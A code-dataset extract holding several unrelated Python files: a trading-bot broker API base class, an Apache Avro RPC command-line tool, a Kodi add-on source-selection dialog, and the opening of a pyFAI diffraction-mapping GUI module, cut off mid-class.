source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
_base.py
|
# Builtins
import datetime as dt
import time
from pathlib import Path
import yaml
import traceback
import threading
from typing import List, Dict, Any
# External libraries
import pandas as pd
# Submodule imports
from harvest.utils import *
class API:
"""
The API class communicates with various API endpoints to perform the
necessary operations. The Base class defines the interface for all API classes to
extend and implement.
Attributes
:interval_list: A list of supported intervals.
:fetch_interval: A string indicating the interval the broker fetches the latest asset data.
This should be initialized in setup_run (see below).
"""
interval_list = [
Interval.MIN_1,
Interval.MIN_5,
Interval.MIN_15,
Interval.MIN_30,
Interval.HR_1,
Interval.DAY_1,
]
def __init__(self, path: str = None):
"""
Performs initializations of the class, such as setting the
timestamp and loading credentials.
There are three API class types, 'streamer', 'broker', and 'both'. A
'streamer' is responsible for fetching data and interacting with
the queue to store data. A 'broker' is used solely for buying and
selling stocks, cryptos and options. Finally, 'both' is used to
indicate that the broker fetch data and buy and sell stocks.
All subclass implementations should call this __init__ method
using `super().__init__(path)`.
:path: path to the YAML file containing credentials to communicate with the API.
If not specified, defaults to './secret.yaml'
"""
self.trader = (
None # Allows broker to handle the case when runs without a trader
)
if path is None:
path = "./secret.yaml"
# Check if file exists
yml_file = Path(path)
if not yml_file.is_file() and not self.create_secret(path):
debugger.debug("Broker not initalized with account information.")
return
with open(path, "r") as stream:
self.config = yaml.safe_load(stream)
self.timestamp = now()
def create_secret(self, path: str):
"""
This method is called when the yaml file with credentials
is not found."""
raise Exception(f"{path} was not found.")
def refresh_cred(self):
"""
Most API endpoints, for security reasons, require a refresh of the access token
every now and then. This method should perform a refresh of the access token.
"""
pass
def setup(self, interval: Dict, trader=None, trader_main=None) -> None:
"""
This function is called right before the algorithm begins,
and initializes several runtime parameters like
the symbols to watch and what interval data is needed.
"""
self.trader = trader
self.trader_main = trader_main
min_interval = None
for sym in interval:
inter = interval[sym]["interval"]
# If the specified interval is not supported on this API, raise Exception
if inter < self.interval_list[0]:
raise Exception(f"Specified interval {inter} is not supported.")
# If the exact inteval is not supported but it can be recreated by aggregating
# candles from a more granular interval
if inter not in self.interval_list:
granular_int = [i for i in self.crypto_interval_list if i < inter]
new_inter = granular_int[-1]
interval[sym]["aggregations"].append(inter)
interval[sym]["interval"] = new_inter
if min_interval is None or interval[sym]["interval"] < min_interval:
min_interval = interval[sym]["interval"]
self.interval = interval
self.poll_interval = min_interval
debugger.debug(f"Interval: {self.interval}")
debugger.debug(f"Poll Interval: {self.poll_interval}")
debugger.debug(f"{type(self).__name__} setup finished")
def start(self):
"""
This method begins streaming data from the API.
The default implementation below is for polling the API.
If your brokerage provides a streaming API, you should override
this method and configure it to use that API. In that case,
make sure to set the callback function to self.main().
:kill_switch: A flag to indicate whether the algorithm should stop
after a single iteration. Usually used for testing.
"""
cur_min = -1
val, unit = expand_interval(self.poll_interval)
debugger.debug(f"{type(self).__name__} started...")
if unit == "MIN":
sleep = val * 60 - 10
while 1:
cur = now()
minutes = cur.minute
if minutes % val == 0 and minutes != cur_min:
self.timestamp = cur
self.main()
time.sleep(sleep)
cur_min = minutes
elif unit == "HR":
sleep = val * 3600 - 60
while 1:
cur = now()
minutes = cur.minute
if minutes == 0 and minutes != cur_min:
self.timestamp = cur
self.main()
time.sleep(sleep)
cur_min = minutes
else:
while 1:
cur = now()
minutes = cur.minute
hours = cur.hour
if hours == 19 and minutes == 50:
self.timestamp = cur
self.main()
time.sleep(80000)
cur_min = minutes
def main(self):
"""
This method is called at the interval specified by the user.
It should create a dictionary where each key is the symbol for an asset,
and the value is the corresponding data in the following pandas dataframe format:
Symbol
open high low close volume
timestamp
--- --- --- --- --- ---
timestamp should be an offset-aware datetime object in UTC timezone.
The dictionary should be passed to the trader by calling `self.trader_main(dict)`
"""
# Iterate through securities in the watchlist. For those that have
# intervals that needs to be called now, fetch the latest data
df_dict = {}
for sym in self.interval:
inter = self.interval[sym]["interval"]
if is_freq(self.timestamp, inter):
n = self.timestamp
latest = self.fetch_price_history(
sym, inter, n - interval_to_timedelta(inter), n
)
df_dict[sym] = latest.iloc[-1]
self.trader_main(df_dict)
def exit(self):
"""
This function is called after every invocation of algo's handler.
The intended purpose is for brokers to clear any cache it may have created.
"""
debugger.debug(f"{type(self).__name__} exited")
def _exception_handler(func):
"""
Wrapper to handle unexpected errors in the wrapped function.
Most functions should be wrapped with this to properly handle errors, such as
when internet connection is lost.
:func: Function to wrap.
:returns: The returned value of func if func runs properly. Raises an Exception if func fails.
"""
def wrapper(*args, **kwargs):
tries = 3
while tries > 0:
try:
return func(*args, **kwargs)
except Exception as e:
self = args[0]
debugger.error(f"Error: {e}")
traceback.print_exc()
debugger.error("Logging out and back in...")
args[0].refresh_cred()
tries = tries - 1
debugger.error("Retrying...")
continue
return wrapper
def _run_once(func):
""" """
def wrapper(*args, **kwargs):
self = args[0]
if self.run_count == 0:
self.run_count += 1
return func
return None
return wrapper
# -------------- Streamer methods -------------- #
def fetch_price_history(
self,
symbol: str,
interval: Interval,
start: dt.datetime = None,
end: dt.datetime = None,
):
"""
Fetches historical price data for the specified asset and period
using the API.
:param symbol: The stock/crypto to get data for.
:param interval: The interval of requested historical data.
:param start: The starting date of the period, inclusive.
:param end: The ending date of the period, inclusive.
:returns: A pandas dataframe, same format as main()
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_price_history`."
)
def fetch_chain_info(self, symbol: str):
"""
Returns information about the symbol's options
:param symbol: Stock symbol. Cannot use crypto.
:returns: A dict with the following keys and values:
- id: ID of the option chain
- exp_dates: List of expiration dates as datetime objects
- multiplier: Multiplier of the option, usually 100
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_chain_info`."
)
def fetch_chain_data(self, symbol: str):
"""
Returns the option chain for the specified symbol.
:param symbol: Stock symbol. Cannot use crypto.
:returns: A dataframe in the following format:
exp_date strike type
OCC
--- --- --- ---
exp_date should be a timezone-aware datetime object localized to UTC
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_chain_data`."
)
def fetch_option_market_data(self, symbol: str):
"""
Retrieves data of specified option.
:param symbol: OCC symbol of option
:returns: A dictionary:
- price: price of option
- ask: ask price
- bid: bid price
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_option_market_data`."
)
# ------------- Broker methods ------------- #
def fetch_stock_positions(self):
"""
Returns all current stock positions
:returns: A list of dictionaries with the following keys and values:
- symbol: Ticker symbol of the stock
- avg_price: The average price the stock was bought at
- quantity: Quantity owned
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_stock_positions`. Returning an empty list."
)
return []
def fetch_option_positions(self):
"""
Returns all current option positions
:returns: A list of dictionaries with the following keys and values:
- symbol: Ticker symbol of the underlying stock
- occ_symbol: OCC symbol of the option
- avg_price: Average price the option was bought at
- quantity: Quantity owned
- multiplier: How many stocks each option represents
- exp_date: When the option expires
- strike_price: Strike price of the option
- type: 'call' or 'put'
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_option_positions`. Returning an empty list."
)
return []
def fetch_crypto_positions(self):
"""
Returns all current crypto positions
:returns: A list of dictionaries with the following keys and values:
- symbol: Ticker symbol for the crypto, prepended with an '@'
- avg_price: The average price the crypto was bought at
- quantity: Quantity owned
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_crypto_positions`. Returning an empty list."
)
return []
def update_option_positions(self, positions: List[Any]):
"""
Updates entries in option_positions list with the latest option price.
This is needed as options are priced based on various metrics,
and cannot be easily calculated from stock prices.
:positions: The option_positions list in the Trader class.
:returns: Nothing
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `update_option_positions`. Doing nothing."
)
def fetch_account(self):
"""
Returns current account information from the brokerage.
:returns: A dictionary with the following keys and values:
- equity: Total assets in the brokerage
- cash: Total cash in the brokerage
- buying_power: Total buying power
- multiplier: Scale of leverage, if leveraging
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_account`."
)
def fetch_stock_order_status(self, id):
"""
Returns the status of a stock order with the given id.
:id: ID of the stock order
:returns: A dictionary with the following keys and values:
- type: 'STOCK'
- id: ID of the order
- symbol: Ticker of stock
- quantity: Quantity ordered
- filled_quantity: Quantity filled so far
- side: 'buy' or 'sell'
- time_in_force: Time the order is in force
- status: Status of the order
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_stock_order_status`."
)
def fetch_option_order_status(self, id):
"""
Returns the status of a option order with the given id.
:id: ID of the option order
:returns: A dictionary with the following keys and values:
- type: 'OPTION'
- id: ID of the order
- symbol: Ticker of underlying stock
- quantity: Quantity ordered
- filled_quantity: Quantity filled so far
- side: 'buy' or 'sell'
- time_in_force: Time the order is in force
- status: Status of the order
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_option_order_status`."
)
def fetch_crypto_order_status(self, id):
"""
Returns the status of a crypto order with the given id.
:id: ID of the crypto order
:returns: A dictionary with the following keys and values:
- type: 'CRYPTO'
- id: ID of the order
- symbol: Ticker of crypto
- quantity: Quantity ordered
- filled_quantity: Quantity filled so far
- side: 'buy' or 'sell'
- time_in_force: Time the order is in force
- status: Status of the order
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_crypto_order_status`."
)
def fetch_order_queue(self):
"""
Returns all current pending orders
returns: A list of dictionaries with the following keys and values:
For stocks:
- type: "STOCK"
- symbol: Symbol of stock
- quantity: Quantity ordered
- filled_qty: Quantity filled
- id: ID of order
- time_in_force: Time in force
- status: Status of the order
- side: 'buy' or 'sell'
For options:
- type: "OPTION",
- symbol: Symbol of stock
- quantity: Quantity ordered
- filled_qty: Quantity filled
- id: ID of order
- time_in_force: Time in force
- status: Status of the order
- legs: A list of dictionaries with keys:
- id: id of leg
- side: 'buy' or 'sell'
For crypto:
- type: "CRYPTO"
- symbol: Symbol of stock
- quantity: Quantity ordered
- filled_qty: Quantity filled
- id: ID of order
- time_in_force: Time in force
- status: Status of the order
- side: 'buy' or 'sell'
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_order_queue`. Returning an empty list."
)
return []
# --------------- Methods for Trading --------------- #
def order_limit(
self,
side: str,
symbol: str,
quantity: float,
limit_price: float,
in_force: str = "gtc",
extended: bool = False,
):
"""
Places a limit order.
:symbol: symbol of asset
:side: 'buy' or 'sell'
:quantity: quantity to buy or sell
:limit_price: limit price
:in_force: 'gtc' by default
:extended: 'False' by default
:returns: A dictionary with the following keys and values:
- type: 'STOCK' or 'CRYPTO'
- id: ID of order
- symbol: symbol of asset
Raises an exception if order fails.
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `order_limit`."
)
def order_option_limit(
self,
side: str,
symbol: str,
quantity: float,
limit_price: float,
type: str,
exp_date: dt.datetime,
strike: float,
in_force: str = "gtc",
):
"""
Order an option.
:side: 'buy' or 'sell'
:symbol: symbol of asset
:in_force:
:limit_price: limit price
:quantity: quantity to sell or buy
:exp_date: expiration date
:strike: strike price
:type: 'call' or 'put'
:returns: A dictionary with the following keys and values:
- type: 'OPTION'
- id: ID of order
- symbol: symbol of asset
Raises an exception if order fails.
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `order_option_limit`."
)
# -------------- Built-in methods -------------- #
# These do not need to be re-implemented in a subclass
def buy(
self, symbol: str, quantity: int, in_force: str = "gtc", extended: bool = False
):
"""
Buys the specified asset.
:symbol: Symbol of the asset to buy
:quantity: Quantity of asset to buy
:in_force: Duration the order is in force
:extended: Whether to trade in extended hours or not.
:returns: The result of order_limit(). Returns None if there is an issue with the parameters.
"""
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
buy_power = self.fetch_account()["buying_power"]
# If there is no trader, streamer must be manually set
price = self.streamer.fetch_price_history(
symbol,
self.interval[symbol]["interval"],
now() - dt.timedelta(days=7),
now(),
)[symbol]["close"][-1]
else:
buy_power = self.trader.account["buying_power"]
price = self.trader.storage.load(symbol, self.interval[symbol]["interval"])[
symbol
]["close"][-1]
limit_price = mark_up(price)
total_price = limit_price * quantity
if total_price >= buy_power:
debugger.error(
f"""Not enough buying power.\n Total price ({price} * {quantity} * 1.05 = {limit_price*quantity}) exceeds buying power {buy_power}.\n Reduce purchase quantity or increase buying power."""
)
return None
debugger.debug(f"{type(self).__name__} ordered a buy of {quantity} {symbol}")
return self.order_limit(
"buy", symbol, quantity, limit_price, in_force, extended
)
def sell(
self,
symbol: str = None,
quantity: int = 0,
in_force: str = "gtc",
extended: bool = False,
):
"""Sells the specified asset.
:symbol: Symbol of the asset to buy
:quantity: Quantity of asset to buy
:in_force: Duration the order is in force
:extended: Whether to trade in extended hours or not.
:returns: The result of order_limit(). Returns None if there is an issue with the parameters.
"""
if symbol == None:
symbol = self.watch[0]
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
price = self.streamer.fetch_price_history(
symbol,
self.interval[symbol]["interval"],
now() - dt.timedelta(days=7),
now(),
)[symbol]["close"][-1]
else:
price = self.trader.storage.load(symbol, self.interval[symbol]["interval"])[
symbol
]["close"][-1]
limit_price = mark_down(price)
debugger.debug(f"{type(self).__name__} ordered a sell of {quantity} {symbol}")
return self.order_limit(
"sell", symbol, quantity, limit_price, in_force, extended
)
def buy_option(self, symbol: str, quantity: int = 0, in_force: str = "gtc"):
"""
Buys the specified option.
:symbol: Symbol of the asset to buy, in OCC format.
:quantity: Quantity of asset to buy
:in_force: Duration the order is in force
:returns: The result of order_option_limit(). Returns None if there is an issue with the parameters.
"""
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
buy_power = self.fetch_account()["buying_power"]
price = self.streamer.fetch_option_market_data(symbol)["price"]
else:
buy_power = self.trader.account["buying_power"]
price = self.trader.streamer.fetch_option_market_data(symbol)["price"]
limit_price = mark_up(price)
total_price = limit_price * quantity
if total_price >= buy_power:
debugger.warning(
f"""
Not enough buying power 🏦.\n
Total price ({price} * {quantity} * 1.05 = {limit_price*quantity}) exceeds buying power {buy_power}.\n
Reduce purchase quantity or increase buying power."""
)
sym, date, option_type, strike = self.occ_to_data(symbol)
return self.order_option_limit(
"buy",
sym,
quantity,
limit_price,
option_type,
date,
strike,
in_force=in_force,
)
def sell_option(self, symbol: str, quantity: int = 0, in_force: str = "gtc"):
"""
Sells the specified option.
:symbol: Symbol of the asset to buy, in OCC format.
:quantity: Quantity of asset to buy
:in_force: Duration the order is in force
:returns: The result of order_option_limit(). Returns None if there is an issue with the parameters.
"""
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
price = self.streamer.fetch_option_market_data(symbol)["price"]
else:
price = self.trader.streamer.fetch_option_market_data(symbol)["price"]
limit_price = mark_down(price)
sym, date, option_type, strike = self.occ_to_data(symbol)
return self.order_option_limit(
"sell",
sym,
quantity,
limit_price,
option_type,
date,
strike,
in_force=in_force,
)
# -------------- Helper methods -------------- #
def has_interval(self, interval: str):
return interval in self.interval_list
def data_to_occ(
self, symbol: str, date: dt.datetime, option_type: str, price: float
):
"""
Converts data into a OCC format string
"""
occ = symbol + ((6 - len(symbol)) * " ")
occ = occ + date.strftime("%y%m%d")
occ = occ + "C" if option_type == "call" else occ + "P"
occ = occ + f"{int(price*1000):08}"
return occ
def occ_to_data(self, symbol: str):
sym = ""
while symbol[0].isalpha():
sym = sym + symbol[0]
symbol = symbol[1:]
symbol = symbol.replace(" ", "")
date = dt.datetime.strptime(symbol[0:6], "%y%m%d")
option_type = "call" if symbol[6] == "C" else "put"
price = float(symbol[7:]) / 1000
return sym, date, option_type, price
def current_timestamp(self):
return self.timestamp
class StreamAPI(API):
""" """
def __init__(self, path: str = None):
super().__init__(path)
self.block_lock = (
threading.Lock()
) # Lock for streams that receive data asynchronously.
self.block_queue = {}
self.first = True
def setup(self, interval: Dict, trader=None, trader_main=None) -> None:
super().setup(interval, trader, trader_main)
self.blocker = {}
def start(self):
debugger.debug(f"{type(self).__name__} started...")
def main(self, df_dict):
"""
Streaming is event driven, so sometimes not all data comes in at once.
StreamAPI class
"""
self.block_lock.acquire()
got = [k for k in df_dict]
# First, identify which symbols need to have data fetched
# for this timestamp
if self.first:
self.needed = [
sym
for sym in self.interval
if is_freq(now(), self.interval[sym]["interval"])
]
self.timestamp = df_dict[got[0]].index[0]
debugger.debug(f"Needs: {self.needed}")
debugger.debug(f"Got data for: {got}")
missing = list(set(self.needed) - set(got))
debugger.debug(f"Still need data for: {missing}")
self.block_queue.update(df_dict)
# debugger.debug(self.block_queue)
# If all data has been received, pass on the data
if len(missing) == 0:
debugger.debug("All data received")
self.trader_main(self.block_queue)
self.block_queue = {}
self.all_recv = True
self.first = True
self.block_lock.release()
return
# If there are data that has not been received, start a timer
if self.first:
timer = threading.Thread(target=self.timeout, daemon=True)
timer.start()
self.all_recv = False
self.first = False
self.needed = missing
self.got = got
self.block_lock.release()
def timeout(self):
debugger.debug("Begin timeout timer")
time.sleep(1)
if not self.all_recv:
debugger.debug("Force flush")
self.flush()
def flush(self):
# For missing data, repeat the existing one
self.block_lock.acquire()
for n in self.needed:
data = (
self.trader.storage.load(n, self.interval[n]["interval"])
.iloc[[-1]]
.copy()
)
data.index = [self.timestamp]
self.block_queue[n] = data
self.block_lock.release()
self.trader_main(self.block_queue)
self.block_queue = {}
|
tool.py
|
#! /usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import sys
import threading
import urlparse
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from avro import datafile, io, ipc, protocol
class GenericResponder(ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = file(proto, 'r').read()
ipc.Responder.__init__(self, protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print >> sys.stderr, "Message: %s Datum: %s" % (message.name, self.datum)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print >> sys.stderr, "Shutting down server."
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = HTTPServer(server_addr, GenericHandler)
print "Port: %s" % server.server_port
sys.stdout.flush()
server.allow_reuse_address = True
print >> sys.stderr, "Starting server."
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
client = ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = file(proto, 'r').read()
requestor = ipc.Requestor(protocol.parse(proto_json), client)
print requestor.request(msg, datum)
def file_or_stdin(f):
if f == "-":
return sys.stdin
else:
return file(f)
def main(args=sys.argv):
if len(args) == 1:
print "Usage: %s [dump|rpcreceive|rpcsend]" % args[0]
return 1
if args[1] == "dump":
if len(args) != 3:
print "Usage: %s dump input_file" % args[0]
return 1
for d in datafile.DataFileReader(file_or_stdin(args[2]), io.DatumReader()):
print repr(d)
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print usage_str
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = dfr.next()
elif args[5] == "-data":
print "JSON Decoder not yet implemented."
return 1
else:
print usage_str
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print usage_str
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = dfr.next()
elif args[5] == "-data":
print "JSON Decoder not yet implemented."
return 1
else:
print usage_str
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
dialogs_list.py
|
from threading import Thread, RLock
import xbmc,os
import xbmcaddon
import xbmcgui
from resources.lib.modules import control
import time
rt_timeout = 500
def select_ext(title, scraped_items):
addonPath = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')
dlg = SelectorDialog("DialogSelectList.xml", addonPath, title=title,
scraped_items=scraped_items)
with ExtendedDialogHacks():
dlg.doModal()
selection = dlg.get_selection()
del dlg
return selection
class FanArtWindow(xbmcgui.WindowDialog):
def __init__(self):
control_background = xbmcgui.ControlImage(0, 0, 1280, 720, xbmcaddon.Addon().getAddonInfo('fanart'))
self.addControl(control_background)
fanart = xbmc.getInfoLabel('ListItem.Property(Fanart_Image)')
if fanart and fanart != "Fanart_Image":
control_fanart = xbmcgui.ControlImage(0, 0, 1280, 720, fanart)
self.addControl(control_fanart)
class ExtendedDialogHacks(object):
def __init__(self):
self.active = False
self.hide_progress = False
self.hide_info = False
self.autohidedialogs = False
if self.autohidedialogs:
self.hide_progress = False
self.hide_info = False
if not self.hide_progress and not self.hide_info:
self.autohidedialogs = False
def __enter__(self):
self.active = True
# self.numeric_keyboard = None
self.fanart_window = FanArtWindow()
## Keyboard hack
# if plugin.get_setting(SETTING_ADVANCED_KEYBOARD_HACKS, converter=bool):
# self.numeric_keyboard = xbmcgui.Window(10109)
# Thread(target = lambda: self.numeric_keyboard.show()).start()
# wait_for_dialog('numericinput', interval=50)
# Show fanart background
self.fanart_window.show()
# Run background task
if self.autohidedialogs:
Thread(target=self.background_task).start()
def background_task(self):
xbmc.sleep(1000)
while not xbmc.abortRequested and self.active:
if self.hide_progress:
active_window = xbmcgui.getCurrentWindowDialogId()
if active_window in [10101, 10151]:
xbmc.executebuiltin("Dialog.Close(%d, true)" % active_window)
if self.hide_info:
if xbmc.getCondVisibility("Window.IsActive(infodialog)"):
xbmc.executebuiltin('Dialog.Close(infodialog, true)')
xbmc.sleep(100)
def __exit__(self, exc_type, exc_value, traceback):
self.active = False
# if self.numeric_keyboard is not None:
# self.numeric_keyboard.close()
# del self.numeric_keyboard
# xbmc.executebuiltin("Dialog.Close(numericinput, true)")
self.fanart_window.close()
del self.fanart_window
class SelectorDialog(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
xbmcgui.WindowXMLDialog.__init__(self)
self.title = kwargs['title']
self.time_start = time.time()
self.timer_active = True
self.items = kwargs['scraped_items']
self.selection = None
self.insideIndex = -1
self.completed_steps = 0
self.selected = []
self.thread = None
self.lock = RLock()
def get_selection(self):
""" get final selection """
self.timer_active = False
return self.selected
def onInit(self):
# set title
self.label = self.getControl(1)
self.label.setLabel(self.title)
# Hide ok button
self.getControl(5).setVisible(False)
# Get active list
try:
self.list = self.getControl(6)
self.list.controlLeft(self.list)
self.list.controlRight(self.list)
self.getControl(3).setVisible(False)
except:
self.list = self.getControl(6)
# self.progress = self.getControl(2)
# populate list
self.thread = Thread(target=self._inside_root)
self.thread.start()
self.setFocus(self.list)
def onAction(self, action):
if action.getId() in (9, 10, 92, 216, 247, 257, 275, 61467, 61448,):
if self.insideIndex == -1:
self.timer_active = False
self.close()
else:
self._inside_root(select=self.insideIndex)
def onClick(self, controlID):
if controlID == 6 or controlID == 3:
num = self.list.getSelectedPosition()
if num >= 0:
if self.insideIndex == -1:
self._inside(num)
else:
self.selection = self.items[self.insideIndex][1][num]
self.close()
def onFocus(self, controlID):
if controlID in (6, 61):
self.setFocus(self.list)
def _inside_root(self):
with self.lock:
self.setFocus(self.list)
for links in self.items:
self.providers_name = links['scraper']
print ("Rebirth QUALITY", links['quality'])
quality = str(links['quality'])
if "k" in quality.lower(): q_icon = "4k.png"
if "1080" in quality: q_icon = "1080.png"
elif "HD" in quality: q_icon = "720.png"
else: q_icon = "sd.png"
# if self.providers_name.lower() == 'kat': q_icon = "kat.jpg"
# if self.providers_name.lower() == 'thepiratebay': q_icon = "thepiratebay.png"
# if self.providers_name.lower() == 'yify': q_icon = "yify.jpg"
# if self.providers_name.lower() == 'leetx': q_icon = "leetx.png"
# if self.providers_name.lower() == 'idope': q_icon = "idope.jpg"
# if self.providers_name.lower() == 'limetorrent': q_icon = "lime.png"
# if self.providers_name.lower() == 'eztv': q_icon = "eztv.png"
if "torrent" in str(links['source']): q_icon = "torrent.png"
if quality == '4k' or quality == '4K': q_icon = "4k.png"
try: info = links['info']
except: info = ""
if not info == "": info = " | %s" % info
if links.get('debridonly', False) == True: label = '[I]DEB[/I] | %s | %s' % (quality, links['scraper'])
else: label = '%s | %s' % (quality, links['scraper'])
label2 = "[I]" + str(links['source']) + "[/I]"
label = label + info
listitem = xbmcgui.ListItem(label=label.upper(), label2=label2.upper())
try:
pluginid = "plugin.video.rebirth"
ARTDIR = xbmc.translatePath(os.path.join('special://home/addons/' + pluginid + '/resources/skins/icons' , ''))
icon = ARTDIR + q_icon
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
self.setFocus(self.list)
# if select >= 0:
# self.list.selectItem(select)
# self.insideIndex = -1
def _inside(self, num):
if num == -1:
self._inside_root(select=self.insideIndex)
return
with self.lock:
links = self.items[num]
next = [y for x,y in enumerate(self.items) if x > num][:50]
if len(links) >= 1:
selected_link = links
self.selected.append(selected_link)
for next_scrape in next:
self.selected.append(next_scrape)
self.timer_active = False
self.close()
return
# self.list.reset()
self.insideIndex = num
def step(self):
self.completed_steps += 1
progress = self.completed_steps * 100 / self.steps
self.progress.setPercent(progress)
self.label.setLabel(u"{0} - {1:d}% ({2}/{3})".format("Select Quality ", progress,
self.completed_steps, self.steps))
# BACKGROUND TIMER
def _populate(self):
# Delay population to let ui settle
# Remember selected item
selectedItem = None
if self.insideIndex == -1:
selectedIndex = self.list.getSelectedPosition()
else:
selectedIndex = self.insideIndex
if selectedIndex >= 0:
selectedItem = self.items[selectedIndex]
# Add new item
# if len(self.items) >= 10:
# self.sort_method()
self.items.extend(result)
self.setFocus(self.list)
if selectedItem is not None:
selectedIndex = self.items.index(selectedItem)
if self.insideIndex != -1:
self.insideIndex = selectedIndex
# Update only if in root
if self.insideIndex == -1:
self._inside_root(select=selectedIndex)
self.setFocus(self.list)
|
diffmap_widget.py
|
# coding: utf-8
#
# Project: Azimuthal integration
# https://github.com/silx-kit/pyFAI
#
# Copyright (C) 2015-2022 European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Module with GUI for diffraction mapping experiments"""
__author__ = "Jérôme Kieffer"
__contact__ = "Jerome.Kieffer@ESRF.eu"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "01/02/2022"
__status__ = "development"
__docformat__ = 'restructuredtext'
import os
import time
import json
import threading
import logging
import numpy
from silx.gui import qt
from silx.gui import icons
from .matplotlib import pyplot, colors
from ..utils import int_, str_, get_ui_file
from ..units import to_unit
from .widgets.WorkerConfigurator import WorkerConfigurator
from .. import worker
from ..diffmap import DiffMap
from .utils.tree import ListDataSet, DataSet
logger = logging.getLogger(__name__)
lognorm = colors.LogNorm()
class IntegrateDialog(qt.QDialog):
def __init__(self, parent=None):
qt.QDialog.__init__(self)
self.widget = WorkerConfigurator(self)
# self.widget.set1dIntegrationOnly(True)
layout = qt.QVBoxLayout(self)
layout.addWidget(self.widget)
buttons = qt.QDialogButtonBox(self)
buttons.setStandardButtons(qt.QDialogButtonBox.Cancel | qt.QDialogButtonBox.Ok)
layout.addWidget(buttons)
